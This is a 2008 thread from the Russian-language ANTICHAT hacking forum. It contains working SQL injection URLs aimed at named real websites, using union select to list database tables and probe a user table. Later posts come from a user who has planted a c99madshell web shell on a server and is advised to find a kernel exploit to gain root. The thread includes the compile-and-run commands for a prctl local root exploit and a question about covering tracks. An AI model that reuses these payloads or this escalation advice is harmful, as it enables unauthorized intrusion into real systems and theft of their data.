HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 29.03.2008, 20:13
d_x
Reservists Of Antichat - Level 6
Регистрация: 25.03.2008
Сообщений: 670
Провел на форуме:
4137635

Репутация: 2407


По умолчанию

Никак нельзя, этот код просто проверяет по регулярным выражениям значения входящих переменных и в случае несоответствия шаблону выдаёт редирект, видимо, на страницу с ошибкой.
 
Ответить с цитированием

  #2  
Старый 29.03.2008, 22:41
mr.The
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,206
Провел на форуме:
4778940

Репутация: 1257


Отправить сообщение для mr.The с помощью ICQ
По умолчанию

нашел название таблицы. а при подставновкке выдаёт ошибку.
нашел вот так http://www.suas.ru/news/show.php?id=-1+union+select+1,table_name,3,4,5,table_schema,7,8 ,9,10+from+information_schema.tables+limit+41,1/*

подставил сюда http://www.suas.ru/news/show.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10+from+ru_suas_r eg_users/* и ошибка =\
 
Ответить с цитированием

  #3  
Старый 29.03.2008, 22:50
d_x
Reservists Of Antichat - Level 6
Регистрация: 25.03.2008
Сообщений: 670
Провел на форуме:
4137635

Репутация: 2407


По умолчанию

В этой таблице нет ни одной записи просто, пустая она:

http://www.suas.ru/news/show.php?id=-1+union+select+1,2,3,4,5,count(1),7,8,9,10%20from% 20ru_suas_reg_users/*
 
Ответить с цитированием

  #4  
Старый 30.03.2008, 00:30
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357

Репутация: 3742


Отправить сообщение для blackybr с помощью ICQ Отправить сообщение для blackybr с помощью AIM Отправить сообщение для blackybr с помощью Yahoo
По умолчанию

дело совсем в другом, а именно в самих правах доступа drw-r--r- к примеру..

есть статья в нашизх статьях, ищи.
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием

  #5  
Старый 30.03.2008, 00:49
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию

Велемир, там надо лимитом пользоваться:
Код:
http://www.laptopshowcase.co.uk/suppliers.php?id=-1%20GROUP%20BY%20suppliers.id%20union%20select%201,2,name,4,5,6,7,8,9%20from%20suppliers%20limit%201,1/*
__________________
Карфаген должен быть разрушен...
 
Ответить с цитированием

права доступа
  #6  
Старый 30.03.2008, 01:34
fervex
Новичок
Регистрация: 12.11.2007
Сообщений: 25
Провел на форуме:
36633

Репутация: 3
Question права доступа

Спасибо, blackybr!

Подскажите, как можно и через что получить в Linux доступ к файлам root/adm, которые открыты только для этого пользователя и закрыты для группы, если есть c99madshell с правами uid=33(www-data) gid=33(www-data) groups=33(www-data) ?

Спасибо!

Последний раз редактировалось fervex; 30.03.2008 в 01:39..
 
Ответить с цитированием

  #7  
Старый 30.03.2008, 01:43
blackybr
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
Провел на форуме:
8042357

Репутация: 3742


Отправить сообщение для blackybr с помощью ICQ Отправить сообщение для blackybr с помощью AIM Отправить сообщение для blackybr с помощью Yahoo
По умолчанию

fervex поднять права, к примеру порутать серв. от рута ты сам сможешь права ставить любые
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
 
Ответить с цитированием

порутать Linux сервер
  #8  
Старый 30.03.2008, 02:08
fervex
Новичок
Регистрация: 12.11.2007
Сообщений: 25
Провел на форуме:
36633

Репутация: 3
Question порутать Linux сервер

Спасибо, blackybr!
а порутать серв можно с помощью сплойта или ещё как?
посоветуйте, что почитать можно по рутанью Linux сервера, если залит c99madshell?
 
Ответить с цитированием

  #9  
Старый 30.03.2008, 02:21
Анжелика
Познающий
Регистрация: 26.03.2008
Сообщений: 31
Провел на форуме:
208349

Репутация: 82
По умолчанию

выполняешь uname -a , смотришь версию ядра и ищешь сплоиты под эту версию
 
Ответить с цитированием

запуск exploit на Linux
  #10  
Старый 30.03.2008, 02:28
fervex
Новичок
Регистрация: 12.11.2007
Сообщений: 25
Провел на форуме:
36633

Репутация: 3
Question запуск exploit на Linux

Спасибо, Анжелик!
Linux webserver2 2.6.15-26-server #1 SMP Aug 2006 i686 GNU/Linux
Версию знаю, сплоит нашёл - http://www.milw0rm.com/exploits/2006

А если я его выполню в c99madshell через: gcc raptor_prctl.c -o raptor_prctl -Wall
./raptor_prctl

то какой будет результат в итоге? у меня у c99madshell'a появятся права root на эту сессию, или навсегда? или ещё что? не запалит ли это меня, и как замести следы?

Последний раз редактировалось fervex; 30.03.2008 в 02:31..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Сценарии/CMF/СMS 26 15.02.2005 22:57



Здесь присутствуют: 9 (пользователей: 0 , гостей: 9)
 


Быстрый переход




ANTICHAT.XYZ